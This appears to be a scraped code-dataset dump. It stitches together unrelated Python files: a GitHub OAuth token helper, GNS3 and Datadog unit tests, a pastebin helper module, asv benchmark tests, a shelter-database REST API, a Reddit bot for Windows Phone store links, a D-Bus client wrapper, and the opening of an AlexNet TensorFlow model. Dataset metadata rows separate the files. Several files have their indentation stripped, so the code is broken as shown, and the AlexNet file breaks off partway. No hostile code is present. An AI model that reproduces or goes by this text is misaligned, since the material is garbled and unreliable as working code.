GITHUB_NEW_TOKEN_URI = 'https://github.com/settings/tokens/new'
fake_username = 'love tools'
def get_auth_token(token):
if token is not None:
return token
token = keyring.get_password('github', fake_username)
if token is not None:
return token
    print("Please enter your GitHub username and password. These are not "
          "stored, only used to get an OAuth token. You can revoke this at "
          "any time on GitHub.")
user = input("Username: ")
pw = getpass.getpass("Password: ")
auth_request = {
"scopes": [
"public_repo",
],
"note": "Love tools",
"note_url": "https://github.com/Carreau/love",
}
response = requests.post('https://api.github.com/authorizations',
auth=(user, pw), data=json.dumps(auth_request))
if response.status_code == 401 and response.headers.get('X-GitHub-OTP') == 'required; sms':
        print("Your login requires an SMS one-time password")
sms_pw = getpass.getpass("SMS password: ")
response = requests.post('https://api.github.com/authorizations',
auth=(user, pw),
data=json.dumps(auth_request),
headers={'X-GitHub-OTP':sms_pw})
response.raise_for_status()
token = json.loads(response.text)['token']
keyring.set_password('github', fake_username, token)
return token
def setup_github_credentials(log):
token = get_auth_token(None)
gh = github.Github(token)
user = gh.get_user()
log.info('Logged in on GitHub as %s ', user.name)
return token, user
def setup_github_repository(user, proposal, log):
from github import UnknownObjectException
try:
repo = user.get_repo(proposal)
        log.info('It appears that repository %s already exists; using it as the remote', repr(proposal))
except UnknownObjectException:
repo = user.create_repo(proposal)
ssh_url = repo.ssh_url
slug = repo.full_name
log.info('Working with repository %s', slug)
    # Clone the GitHub repo locally over SSH
log.info("Cloning github repository locally")
log.info("Calling subprocess : %s", ' '.join(['git', 'clone' , ssh_url]))
subprocess.call(['git', 'clone' , ssh_url])
return slug
| mit | 3,058,954,655,249,858,600 | 30.441558 | 100 | 0.625361 | false | 3.836767 | false | false | false |
GNS3/gns3-server | tests/handlers/api/controller/test_drawing.py | 1 | 3125 | # -*- coding: utf-8 -*-
#
# Copyright (C) 2020 GNS3 Technologies Inc.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from gns3server.controller.drawing import Drawing
async def test_create_drawing(controller_api, project):
params = {
"svg": '<svg height="210" width="500"><line x1="0" y1="0" x2="200" y2="200" style="stroke:rgb(255,0,0);stroke-width:2" /></svg>',
"x": 10,
"y": 20,
"z": 0
}
response = await controller_api.post("/projects/{}/drawings".format(project.id), params)
assert response.status == 201
assert response.json["drawing_id"] is not None
async def test_get_drawing(controller_api, project):
params = {
"svg": '<svg height="210" width="500"><line x1="0" y1="0" x2="200" y2="200" style="stroke:rgb(255,0,0);stroke-width:2" /></svg>',
"x": 10,
"y": 20,
"z": 0
}
response = await controller_api.post("/projects/{}/drawings".format(project.id), params)
response = await controller_api.get("/projects/{}/drawings/{}".format(project.id, response.json["drawing_id"]))
assert response.status == 200
assert response.json["x"] == 10
async def test_update_drawing(controller_api, project):
params = {
"svg": '<svg height="210" width="500"><line x1="0" y1="0" x2="200" y2="200" style="stroke:rgb(255,0,0);stroke-width:2" /></svg>',
"x": 10,
"y": 20,
"z": 0
}
response = await controller_api.post("/projects/{}/drawings".format(project.id), params)
response = await controller_api.put("/projects/{}/drawings/{}".format(project.id, response.json["drawing_id"]), {"x": 42})
assert response.status == 201
assert response.json["x"] == 42
async def test_list_drawing(controller_api, project):
params = {
"svg": '<svg height="210" width="500"><line x1="0" y1="0" x2="200" y2="200" style="stroke:rgb(255,0,0);stroke-width:2" /></svg>',
"x": 10,
"y": 20,
"z": 0
}
await controller_api.post("/projects/{}/drawings".format(project.id), params)
response = await controller_api.get("/projects/{}/drawings".format(project.id))
assert response.status == 200
assert len(response.json) == 1
async def test_delete_drawing(controller_api, project):
drawing = Drawing(project)
project._drawings = {drawing.id: drawing}
response = await controller_api.delete("/projects/{}/drawings/{}".format(project.id, drawing.id))
assert response.status == 204
assert drawing.id not in project.drawings
| gpl-3.0 | -2,907,817,951,550,079,000 | 34.91954 | 137 | 0.64512 | false | 3.483835 | false | false | false |
DataDog/integrations-core | datadog_checks_base/tests/test_utils.py | 1 | 8576 | # -*- coding: utf-8 -*-
# (C) Datadog, Inc. 2018-present
# All rights reserved
# Licensed under a 3-clause BSD style license (see LICENSE)
from decimal import ROUND_HALF_DOWN
import mock
import pytest
from six import PY2, PY3
from datadog_checks.base.utils.common import ensure_bytes, ensure_unicode, pattern_filter, round_value, to_native_string
from datadog_checks.base.utils.containers import hash_mutable, iter_unique
from datadog_checks.base.utils.limiter import Limiter
from datadog_checks.base.utils.secrets import SecretsSanitizer
class Item:
def __init__(self, name):
self.name = name
def __eq__(self, other):
return self.name == other.name
class TestPatternFilter:
def test_no_items(self):
items = []
whitelist = ['mock']
assert pattern_filter(items, whitelist=whitelist) == []
def test_no_patterns(self):
items = ['mock']
assert pattern_filter(items) is items
def test_multiple_matches_whitelist(self):
items = ['abc', 'def', 'abcdef', 'ghi']
whitelist = ['abc', 'def']
assert pattern_filter(items, whitelist=whitelist) == ['abc', 'def', 'abcdef']
def test_multiple_matches_blacklist(self):
items = ['abc', 'def', 'abcdef', 'ghi']
blacklist = ['abc', 'def']
assert pattern_filter(items, blacklist=blacklist) == ['ghi']
def test_whitelist_blacklist(self):
items = ['abc', 'def', 'abcdef', 'ghi']
whitelist = ['def']
blacklist = ['abc']
assert pattern_filter(items, whitelist=whitelist, blacklist=blacklist) == ['def']
def test_key_function(self):
items = [Item('abc'), Item('def'), Item('abcdef'), Item('ghi')]
whitelist = ['abc', 'def']
assert pattern_filter(items, whitelist=whitelist, key=lambda item: item.name) == [
Item('abc'),
Item('def'),
Item('abcdef'),
]
class TestLimiter:
def test_no_uid(self):
warning = mock.MagicMock()
limiter = Limiter("my_check", "names", 10, warning_func=warning)
for _ in range(0, 10):
assert limiter.is_reached() is False
assert limiter.get_status() == (10, 10, False)
# Reach limit
assert limiter.is_reached() is True
assert limiter.get_status() == (11, 10, True)
# Make sure warning is only sent once
assert limiter.is_reached() is True
warning.assert_called_once_with("Check %s exceeded limit of %s %s, ignoring next ones", "my_check", 10, "names")
def test_with_uid(self):
warning = mock.MagicMock()
limiter = Limiter("my_check", "names", 10, warning_func=warning)
for _ in range(0, 20):
assert limiter.is_reached("dummy1") is False
assert limiter.get_status() == (1, 10, False)
for _ in range(0, 20):
assert limiter.is_reached("dummy2") is False
assert limiter.get_status() == (2, 10, False)
warning.assert_not_called()
def test_mixed(self):
limiter = Limiter("my_check", "names", 10)
for _ in range(0, 20):
assert limiter.is_reached("dummy1") is False
assert limiter.get_status() == (1, 10, False)
for _ in range(0, 5):
assert limiter.is_reached() is False
assert limiter.get_status() == (6, 10, False)
def test_reset(self):
limiter = Limiter("my_check", "names", 10)
for _ in range(1, 20):
limiter.is_reached("dummy1")
assert limiter.get_status() == (1, 10, False)
limiter.reset()
assert limiter.get_status() == (0, 10, False)
assert limiter.is_reached("dummy1") is False
assert limiter.get_status() == (1, 10, False)
class TestRounding:
def test_round_half_up(self):
assert round_value(3.5) == 4.0
def test_round_modify_method(self):
assert round_value(3.5, rounding_method=ROUND_HALF_DOWN) == 3.0
def test_round_modify_sig_digits(self):
assert round_value(2.555, precision=2) == 2.560
assert round_value(4.2345, precision=2) == 4.23
assert round_value(4.2345, precision=3) == 4.235
class TestContainers:
def test_iter_unique(self):
custom_queries = [
{
'metric_prefix': 'database',
'tags': ['test:database'],
'query': 'SELECT thing1, thing2 FROM TABLE',
'columns': [{'name': 'database.metric', 'type': 'count'}, {'name': 'tablespace', 'type': 'tag'}],
},
{
'tags': ['test:database'],
'columns': [{'name': 'tablespace', 'type': 'tag'}, {'name': 'database.metric', 'type': 'count'}],
'query': 'SELECT thing1, thing2 FROM TABLE',
'metric_prefix': 'database',
},
]
assert len(list(iter_unique(custom_queries))) == 1
@pytest.mark.parametrize(
'value',
[
pytest.param({'x': 'y'}, id='dict'),
pytest.param({'x': 'y', 'z': None}, id='dict-with-none-value'),
pytest.param({'x': 'y', None: 't'}, id='dict-with-none-key'),
pytest.param({'x': ['y', 'z'], 't': 'u'}, id='dict-nest-list'),
pytest.param(['x', 'y'], id='list'),
pytest.param(['x', None], id='list-with-none'),
pytest.param(('x', None), id='tuple-with-none'),
pytest.param({'x', None}, id='set-with-none'),
],
)
def test_hash_mutable(self, value):
h = hash_mutable(value)
assert isinstance(h, int)
@pytest.mark.skipif(
PY2,
reason="In Python 2, a < b when a and b are of different types returns `False` (does not raise `TypeError`)",
)
@pytest.mark.parametrize(
'value',
[
pytest.param(['x', 1], id='mixed-list'),
pytest.param(['x', [1, 2, 3]], id='mixed-list-nested-1'),
pytest.param(['x', {'y': 'z'}], id='mixed-list-nested-2'),
pytest.param(('x', 1), id='mixed-tuple'),
pytest.param({'x', 1}, id='mixed-set'),
pytest.param({'x': 1, 2: 'y'}, id='mixed-dict-keys'),
],
)
def test_hash_mutable_unsupported_mixed_type(self, value):
"""
Hashing mixed type containers is not supported, mostly because we haven't needed to add support for it yet.
"""
with pytest.raises(TypeError):
hash_mutable(value)
@pytest.mark.parametrize(
'left, right',
[
pytest.param([1, 2], [2, 1], id='top-level'),
pytest.param({'x': [1, 2]}, {'x': [2, 1]}, id='nested'),
],
)
def test_hash_mutable_commutative(self, left, right):
"""
hash_mutable() is expected to return the same hash regardless of the order of items in the container.
"""
assert hash_mutable(left) == hash_mutable(right)
class TestBytesUnicode:
@pytest.mark.skipif(PY3, reason="Python 3 does not support explicit bytestring with special characters")
def test_ensure_bytes_py2(self):
assert ensure_bytes('éâû') == 'éâû'
assert ensure_bytes(u'éâû') == 'éâû'
def test_ensure_bytes(self):
assert ensure_bytes('qwerty') == b'qwerty'
def test_ensure_unicode(self):
assert ensure_unicode('éâû') == u'éâû'
assert ensure_unicode(u'éâû') == u'éâû'
def test_to_native_string(self):
# type: () -> None
text = u'éâû'
binary = text.encode('utf-8')
if PY3:
assert to_native_string(binary) == text
else:
assert to_native_string(binary) == binary
class TestSecretsSanitizer:
def test_default(self):
# type: () -> None
secret = 's3kr3t'
sanitizer = SecretsSanitizer()
assert sanitizer.sanitize(secret) == secret
def test_sanitize(self):
# type: () -> None
secret = 's3kr3t'
sanitizer = SecretsSanitizer()
sanitizer.register(secret)
assert all(letter == '*' for letter in sanitizer.sanitize(secret))
def test_sanitize_multiple(self):
# type: () -> None
pwd1 = 's3kr3t'
pwd2 = 'admin123'
sanitizer = SecretsSanitizer()
sanitizer.register(pwd1)
sanitizer.register(pwd2)
message = 'Could not authenticate with password {}, did you try {}?'.format(pwd1, pwd2)
sanitized = sanitizer.sanitize(message)
assert pwd1 not in sanitized
assert pwd2 not in sanitized
| bsd-3-clause | 6,135,690,517,738,410,000 | 32.790514 | 120 | 0.566031 | false | 3.5532 | true | false | false |
hmngwy/pipebin | helpers.py | 1 | 1045 | import datetime
import config
import random
import string
import os
import gnupg
textchars = bytearray({7,8,9,10,12,13,27} | set(range(0x20, 0x100)) - {0x7f})
is_binary_string = lambda bytes: bool(bytes.translate(None, textchars))
def log_to_stdout(message):
time_now = str(datetime.datetime.now()).split('.')[0]
print('[{0}] {1}'.format(time_now, message))
def path_gen(slug):
return config.store_dir + '/' + slug
def slug_gen(size=6, chars=string.ascii_lowercase + string.digits):
slug = ''.join(random.choice(chars) for _ in range(size))
if os.path.exists(path_gen(slug)):
slug = slug_gen(6, chars)
return slug
def save_file(slug, string):
with open(path_gen(slug), "wb") as out:
out.write(string)
def create_gpg():
gpghome = config.gpghome + '/' + slug_gen(4)
os.makedirs(gpghome)
open(gpghome + '/gpg.conf', 'a').close()
os.chmod(gpghome + '/gpg.conf', 0o600)
os.chmod(gpghome, 0o700)
    gpg = gnupg.GPG(gnupghome=gpghome)
gpg.list_keys()
return gpg, gpghome
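# Illustrative usage sketch (not part of the original module): how the helpers
# above compose into a minimal "save a paste" flow; config.store_dir is assumed
# to exist and be writable.
if __name__ == '__main__':
    slug = slug_gen()                   # e.g. 'a3f9k2'; retries on collision
    save_file(slug, b'hello, pipebin')  # bytes, since save_file opens in "wb"
    log_to_stdout('saved paste at {0}'.format(path_gen(slug)))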
| gpl-2.0 | 6,882,945,678,450,637,000 | 28.027778 | 77 | 0.650718 | false | 2.910864 | false | false | false |
spacetelescope/asv | test/test_find.py | 3 | 1999 | # -*- coding: utf-8 -*-
# Licensed under a 3-clause BSD style license - see LICENSE.rst
from __future__ import (absolute_import, division, print_function,
unicode_literals)
import os
import sys
import pytest
from asv.util import check_output, which
from . import tools
from .test_workflow import generate_basic_conf
WIN = (os.name == 'nt')
def test_find(capfd, tmpdir):
values = [
(None, None),
(1, 1),
(3, 1),
(None, 1),
(6, None),
(5, 1),
(6, 1),
(6, 1),
(6, 6),
(6, 6),
]
tmpdir, local, conf, machine_file = generate_basic_conf(tmpdir, values=values, dummy_packages=False)
# Test find at least runs
tools.run_asv_with_conf(conf, 'find', "master~5..master", "params_examples.track_find_test",
_machine_file=machine_file)
# Check it found the first commit after the initially tested one
output, err = capfd.readouterr()
regression_hash = check_output(
[which('git'), 'rev-parse', 'master^'], cwd=conf.repo)
assert "Greatest regression found: {0}".format(regression_hash[:8]) in output
@pytest.mark.flaky(reruns=1, reruns_delay=5) # depends on a timeout
def test_find_timeout(capfd, tmpdir):
values = [
(1, 0),
(1, 0),
(1, -1)
]
tmpdir, local, conf, machine_file = generate_basic_conf(tmpdir, values=values, dummy_packages=False)
# Test find at least runs
tools.run_asv_with_conf(conf, 'find', "-e", "master", "params_examples.time_find_test_timeout",
_machine_file=machine_file)
# Check it found the first commit after the initially tested one
output, err = capfd.readouterr()
regression_hash = check_output(
[which('git'), 'rev-parse', 'master'], cwd=conf.repo)
assert "Greatest regression found: {0}".format(regression_hash[:8]) in output
assert "asv: benchmark timed out (timeout 1.0s)" in output
| bsd-3-clause | -502,191,799,437,568,300 | 27.15493 | 104 | 0.604302 | false | 3.446552 | true | false | false |
rodekruis/shelter-database | src/web/views/api/shelter_api_v01.py | 2 | 3676 | #! /usr/bin/env python
#-*- coding: utf-8 -*-
# ***** BEGIN LICENSE BLOCK *****
# This file is part of Shelter Database.
# Copyright (c) 2016
# All rights reserved.
#
#
#
# ***** END LICENSE BLOCK *****
from bootstrap import app, manager
from web import models
from web import processors
# 'User' Web service
blueprint_user = manager.create_api_blueprint(models.User,
exclude_columns=['pwdhash'],
methods=['GET', 'POST', 'PUT', 'DELETE'],
preprocessors=dict(
GET_SINGLE=[processors.auth_func],
GET_MANY=[processors.auth_func],
POST=[processors.auth_func,
processors.shelter_POST_preprocessor],
DELETE=[processors.auth_func]))
# 'Shelter' Web service
blueprint_shelter = manager.create_api_blueprint(models.Shelter,
exclude_columns=['user_id', 'responsible.pwdhash',
'responsible.email'],
methods=['GET', 'POST', 'PUT', 'DELETE'],
preprocessors=dict(
POST=[processors.auth_func,
processors.shelter_POST_preprocessor],
DELETE=[processors.auth_func]))
# 'ShelterPicture' Web service
blueprint_shelter_picture = manager.create_api_blueprint(models.ShelterPicture,
methods=['GET', 'POST', 'PUT', 'DELETE'])
# 'Section' Web service
blueprint_section = manager.create_api_blueprint(models.Section,
methods=['GET', 'POST', 'PUT', 'DELETE'])
# 'Category' Web service
blueprint_category = manager.create_api_blueprint(models.Category,
methods=['GET', 'POST', 'PUT', 'DELETE'])
# 'Attribute' Web service
blueprint_attribute = manager.create_api_blueprint(models.Attribute,
methods=['GET', 'POST', 'PUT', 'DELETE'],
results_per_page = 10000000,
max_results_per_page = 10000000)
# 'AttributePicture' Web service
blueprint_attribute_picture = manager.create_api_blueprint(models.AttributePicture,
methods=['GET', 'POST', 'PUT', 'DELETE'])
# 'Value' Web service
blueprint_value = manager.create_api_blueprint(models.Value,
methods=['GET', 'POST', 'PUT', 'DELETE'],
preprocessors=dict(
PUT_SINGLE=[processors.value_edit_preprocessor],
PUT_MANY=[processors.value_edit_preprocessor]
))
# 'Property' Web service
blueprint_property = manager.create_api_blueprint(models.Property,
methods=['GET', 'POST', 'PUT', 'PATCH', 'DELETE'],
results_per_page = 10000000,
max_results_per_page = 10000000,
preprocessors=dict(
POST=[processors.auth_func,
processors.property_preprocessor],
PUT=[processors.auth_func,
processors.property_preprocessor],
DELETE=[processors.auth_func]))
# 'Page' Web service
blueprint_page = manager.create_api_blueprint(models.Page,
methods=['GET', 'POST', 'PUT', 'PATCH', 'DELETE'])
# 'Translation' Web service
blueprint_translation = manager.create_api_blueprint(models.Translation,
methods=['GET', 'POST', 'PUT', 'PATCH', 'DELETE'])
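# Illustrative request shapes these blueprints expose (Flask-Restless routes
# them under the app's API prefix; "/api" and the collection names below are
# assumptions, not taken from this file):
#
#   GET    /api/shelter        -> list shelters, pwdhash/email excluded
#   POST   /api/shelter        -> runs auth_func + shelter_POST_preprocessor
#   DELETE /api/shelter/<id>   -> requires auth_func
#   PUT    /api/value/<id>     -> runs value_edit_preprocessor first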
| mit | -5,800,293,617,874,024,000 | 35.510204 | 83 | 0.527476 | false | 4.504902 | false | true | false |
iAmMrinal0/wpstore-reddit-bot | wpstorebot.py | 1 | 4862 | import praw
import OAuth2Util
import requests
import re
import time
from bs4 import BeautifulSoup
STORE_LINK = "https://www.windowsphone.com/en-us/search"
SUBREDDIT = ""
SLEEP = 60
BOT_BY = """------
^Bot ^by ^[/u/iammrinal0](/user/iammrinal0)"""
def get_url(app_name):
set_of_links = ""
ctrl = 0
heads = {"User-Agent": "Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0)"
" Gecko/20100101 Firefox/36.0"}
results = requests.get(STORE_LINK, params={"q": app_name},
headers=heads)
soup = BeautifulSoup(results.content, "html.parser")
for tag in soup.find_all("a", {"data-os": True}):
if tag["data-os"] == "app":
if tag.string is not None:
univ_url = universal_url(tag["href"])
publisher = get_publisher(univ_url)
possible = "Possible matches for *{0}*:\n\n".format(app_name)
if publisher:
if app_name.lower() == tag.string.lower():
set_of_links += prepare_comment(
tag.string, univ_url, publisher)
break
else:
if ctrl == 0:
set_of_links += possible
set_of_links += prepare_comment(
tag.string, univ_url, publisher, True)
ctrl += 1
if ctrl == 3:
break
if not set_of_links:
set_of_links = "This app was not found: *{0}*\n\n".format(app_name)
return set_of_links
def prepare_comment(app_name, app_url, app_dev, possible=None):
tabs = ""
if possible:
tabs = "* "
return "{0}[{1}]({2}) by {3}\n\n".format(tabs, app_name, app_url, app_dev)
def get_publisher(app_url):
heads = {"User-Agent": "Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0)"
" Gecko/20100101 Firefox/36.0"}
results = requests.get(app_url, headers=heads)
soup = BeautifulSoup(results.content, "html.parser")
publisher = soup.find("div",
{"class": "content m-b-n clamp-5"}
)
if publisher:
return publisher.text.strip()
def universal_url(url):
return "{0}s?appid={1}".format(url[:28], url[-36:])
def replied_file(comm_id):
with open("comments.txt", "a") as f:
f.write("\n")
f.write("\n".join(comm_id))
def post_comment(comment, reply, comment_submission):
if comment_submission:
comment.reply(reply)
else:
comment.add_comment(reply)
return comment.id
def get_app_name(stri):
trigger = "\w*wpapp\[([^]]*)\]"
exp = re.compile(trigger, re.I)
found = exp.findall(stri)
if found:
return found
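# Example of the trigger syntax get_app_name() recognises (illustrative only):
# it scans a comment or submission body for "wpapp[...]" markers.
#
#   >>> get_app_name("Is there a client? wpapp[Tweetium, Readit]")
#   ['Tweetium, Readit']
#
# Comma-separated names inside one trigger are split apart later, in
# bot_process().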
def bot_process(text, comment_submission, replied_id):
comment_id = []
if comment_submission:
data = text.body
else:
data = text.selftext
trigger_found = get_app_name(data)
    if trigger_found and str(text.id) not in replied_id:
app_names = []
for apps in trigger_found:
if any("," in s for s in apps):
name = apps.split(",")
for app_split in name:
app_names.append(app_split.strip().lower())
else:
app_names.append(apps.strip().lower())
url = ""
for name in app_names:
url += get_url(name)
if url:
print("commenting...")
done_id = post_comment(text, url + BOT_BY, comment_submission)
comment_id.append(str(done_id))
return comment_id
def main():
with open("comments.txt", "r") as f:
replied_id = f.read().splitlines()
r = praw.Reddit(user_agent="WP Store Linker v0.1 by /u/iammrinal0")
OAuth2Util.OAuth2Util(r)
sub = r.get_subreddit(SUBREDDIT)
print("Starting Bot...")
while True:
sub.refresh()
comment_id = []
for comment in sub.get_comments():
cmnt_id = bot_process(comment, True, replied_id)
if cmnt_id:
comment_id.extend(cmnt_id)
if comment_id:
print("Writing to file...")
replied_file(comment_id)
replied_id.extend(comment_id)
print("Done! Now sleeping for {0}s".format(SLEEP))
time.sleep(SLEEP)
comment_id = []
for submn in sub.get_new():
cmnt_id = bot_process(submn, False, replied_id)
if cmnt_id:
comment_id.extend(cmnt_id)
if comment_id:
print("Writing to file...")
replied_file(comment_id)
replied_id.extend(comment_id)
print("Done! Now sleeping for {0}s".format(SLEEP))
time.sleep(SLEEP)
if __name__ == "__main__":
main()
| mit | 3,382,337,231,833,234,000 | 28.828221 | 78 | 0.529412 | false | 3.53343 | false | false | false |
tgcmteam/tgcmlinux | src/tgcm/contrib/freedesktopnet/dbusclient/__init__.py | 1 | 7706 | #!/usr/bin/env python
# Copyright (C) 2009 Martin Vidner
#
#
# Authors:
# Martin Vidner <martin at vidnet.net>
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2, or (at your option)
# any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301
# USA
"Convenience wrappers around dbus-python"
import dbus
import functools
# TODO rename to adaptors
from func import Adaptor, MethodAdaptor, PropertyAdaptor, SignalAdaptor
def object_path(o):
"""Return the object path of o.
If o is a proxy object, use its appropriate attribute.
Otherwise assume that o already is an object path.
"""
if isinstance(o, dbus.proxies.ProxyObject):
return o.object_path
# hope it is ok
return o
class DBusMio(dbus.proxies.ProxyObject):
"""Multi-interface object.
Will look into introspection data to find which interface
to use for a method or a property, obviating the need for
dbus.proxies.Interface.
If introspection is not available, provide default_interface
to the constructor.
BUGS: 1st method call will block with introspection"""
def __init__(self, conn=None, bus_name=None, object_path=None, introspect=True, follow_name_owner_changes=False, **kwargs):
"""Constructor.
kwargs may contain default_interface, to be used
if introspection does not provide it for a method/property
"""
self.__default_interface = kwargs.pop("default_interface", None)
super(DBusMio, self).__init__(conn, bus_name, object_path, introspect, follow_name_owner_changes, **kwargs)
def set_base_iface(self, iface):
self.__base_interface = iface
def __getattr__(self, name):
"""Proxied DBus methods.
Uses introspection or default_interface to find the interface.
"""
# TODO cache
# iface = self._interface_cache.get(name)
# if iface == None:
iface = self.__default_interface
# _introspect_method_map comes from ProxyObject
# But it will be empty until the async introspection finishes
        self._introspect_block()  # FIXME: make it work with async methods
methods = self._introspect_method_map.keys()
for im in methods:
(i, m) = im.rsplit(".", 1)
if m == name:
iface = i
# print "METHOD %s INTERFACE %s" %(name, iface)
callable = super(DBusMio, self).__getattr__(name)
return functools.partial(callable, dbus_interface=iface, byte_arrays=True)
# properties
def __getitem__(self, key):
"""Proxies DBus properties as dictionary items.
a = DBusMio(...)
p = a["Prop"]
Uses default_interface (because dbus.proxies.ProxyObject
does not store introspection data for properties, boo. TODO.)
"""
iface = self.__default_interface # TODO cache
base_iface = self.__base_interface
# TODO _introspect_property_map
pmi = dbus.Interface(self, "org.freedesktop.DBus.Properties")
try:
return pmi.Get(iface, key, byte_arrays=True)
except dbus.exceptions.DBusException, e:
if "AccessDenied" in e.get_dbus_name():
return pmi.Get(base_iface, key, byte_arrays=True)
def __setitem__(self, key, value):
"""Proxies DBus properties as dictionary items.
a = DBusMio(...)
a["Prop"] = "Hello"
Uses default_interface (because dbus.proxies.ProxyObject
does not store introspection data for properties, boo. TODO.)
"""
        iface = self.__default_interface  # TODO cache
        base_iface = self.__base_interface  # fallback, mirroring __getitem__
        # TODO _introspect_property_map
        pmi = dbus.Interface(self, "org.freedesktop.DBus.Properties")
        pmi_res = pmi.Set(iface, key, value, byte_arrays=True)
        if not pmi_res:
            return pmi.Set(base_iface, key, value, byte_arrays=True)
def _mklist(x):
"""Return a list.
Tuples are made into lists, everything else a singleton list.
"""
if isinstance(x, list):
return x
elif isinstance(x, tuple):
return [i for i in x]
else:
return [x]
class DBusClient(DBusMio):
"""
"""
_adaptors = {
"methods": {},
"signals": {},
"properties": {},
}
def set_base_iface(self, iface):
super(DBusClient, self).set_base_iface(iface)
@classmethod
def _get_adaptor(cls, kind, name):
# print "GET", cls, kind, name
try:
a = cls._adaptors[kind][name]
# print ">", a
# TODO cache somehow?
return a
except KeyError:
scls = cls.__mro__[1] # can use "super"? how?
try:
return scls._get_adaptor(kind, name)
except AttributeError: # no _get_adaptor there
raise KeyError(":".join((kind, name)))
@classmethod
def _add_adaptor(cls, kind, name, adaptor):
# print "ADD", cls, kind, name, adaptor
assert(isinstance(adaptor, Adaptor))
cls._adaptors[kind][name] = adaptor
@classmethod
def _add_adaptors_dict(cls, andict):
"""
a nested dictionary of kind:name:adaptor,
"""
if not cls.__dict__.has_key("_adaptors"):
# do not use inherited attribute
cls._adaptors = {"methods":{}, "properties":{}, "signals":{}}
for section in cls._adaptors.keys():
secsource = andict.pop(section, {})
for name, adaptor in secsource.iteritems():
cls._add_adaptor(section, name, adaptor)
assert len(andict) == 0
# print "AA", cls, cls._adaptors
@classmethod
def _add_adaptors(cls, **kwargs):
"""kwargs: a *flat* dictionary of name: adaptor"""
adict = {"methods":{}, "properties":{}, "signals":{}}
for k, v in kwargs.iteritems():
kind = v.kind()
adict[kind][k] = v
cls._add_adaptors_dict(adict)
def __getattr__(self, name):
"Wrap return values"
callable = super(DBusClient, self).__getattr__(name)
try:
adaptor = self._get_adaptor("methods", name)
return adaptor.adapt(callable)
except KeyError:
return callable
# properties
def __getitem__(self, key):
value = super(DBusClient, self).__getitem__(key)
try:
adaptor = self._get_adaptor("properties", key)
return adaptor.adapt(value)
except KeyError:
return value
def __setitem__(self, key, value):
try:
adaptor = self._get_adaptor("properties", key)
value = adaptor.adapt_write(value)
except KeyError:
pass
return super(DBusClient, self).__setitem__(key, value)
# signals
# overrides a ProxyObject method
def _connect_to_signal(self, signame, handler, interface=None, **kwargs):
"Wrap signal handler, with arg adaptors"
# TODO also demarshal kwargs
adaptor = self._get_adaptor("signals", signame)
wrap_handler = adaptor.adapt(handler)
return self.connect_to_signal(signame, wrap_handler, interface, **kwargs)
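# Minimal usage sketch (hypothetical bus/object names; assumes a running
# session bus). DBusClient behaves like DBusMio -- methods resolve their
# interface via introspection or default_interface, properties go through
# org.freedesktop.DBus.Properties -- plus optional Adaptor-based wrapping of
# return values registered on the subclass.
#
#   bus = dbus.SessionBus()
#   client = DBusClient(bus, 'org.example.Service', '/org/example/Object',
#                       default_interface='org.example.Service')
#   client.set_base_iface('org.example.Service')  # property fallback interface
#   client.Ping()             # dbus_interface chosen from introspection data
#   state = client['State']   # property read through __getitem__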
| gpl-2.0 | -9,011,943,761,378,264,000 | 32.215517 | 127 | 0.61225 | false | 3.941688 | false | false | false |
JasonHanG/tensor-gallery | alexNet-finetune/alexnet.py | 1 | 7368 | """This is a TensorFlow implementation of AlexNet by Alex Krizhevsky et al.
Paper:
(http://papers.nips.cc/paper/4824-imagenet-classification-with-deep-convolutional-neural-networks.pdf)
@original author: Frederik Kratzert (contact: f.kratzert(at)gmail.com)
"""
import tensorflow as tf
import numpy as np
class AlexNet(object):
"""Implementation of the AlexNet."""
def __init__(self, x, keep_prob, num_classes, skip_layer,
weights_path='DEFAULT'):
"""Create the graph of the AlexNet model.
Args:
x: Placeholder for the input tensor.
keep_prob: Dropout probability.
num_classes: Number of classes in the dataset.
skip_layer: List of names of the layer, that get trained from
scratch
weights_path: Complete path to the pretrained weight file, if it
isn't in the same folder as this code
"""
# Parse input arguments into class variables
self.X = x
self.NUM_CLASSES = num_classes
self.KEEP_PROB = keep_prob
self.SKIP_LAYER = skip_layer
if weights_path == 'DEFAULT':
self.WEIGHTS_PATH = 'bvlc_alexnet.npy'
else:
self.WEIGHTS_PATH = weights_path
# Call the create function to build the computational graph of AlexNet
self.create()
def create(self):
"""Create the network graph."""
# 1st Layer: Conv (w ReLu) -> Lrn -> Pool
conv1 = conv(self.X, 11, 11, 96, 4, 4, padding='VALID', name='conv1')
norm1 = lrn(conv1, 2, 2e-05, 0.75, name='norm1')
pool1 = max_pool(norm1, 3, 3, 2, 2, padding='VALID', name='pool1')
# 2nd Layer: Conv (w ReLu) -> Lrn -> Pool with 2 groups
conv2 = conv(pool1, 5, 5, 256, 1, 1, groups=2, name='conv2')
norm2 = lrn(conv2, 2, 2e-05, 0.75, name='norm2')
pool2 = max_pool(norm2, 3, 3, 2, 2, padding='VALID', name='pool2')
# 3rd Layer: Conv (w ReLu)
conv3 = conv(pool2, 3, 3, 384, 1, 1, name='conv3')
# 4th Layer: Conv (w ReLu) splitted into two groups
conv4 = conv(conv3, 3, 3, 384, 1, 1, groups=2, name='conv4')
# 5th Layer: Conv (w ReLu) -> Pool splitted into two groups
conv5 = conv(conv4, 3, 3, 256, 1, 1, groups=2, name='conv5')
pool5 = max_pool(conv5, 3, 3, 2, 2, padding='VALID', name='pool5')
# 6th Layer: Flatten -> FC (w ReLu) -> Dropout
flattened = tf.reshape(pool5, [-1, 6*6*256])
fc6 = fc(flattened, 6*6*256, 4096, name='fc6')
dropout6 = dropout(fc6, self.KEEP_PROB)
# 7th Layer: FC (w ReLu) -> Dropout
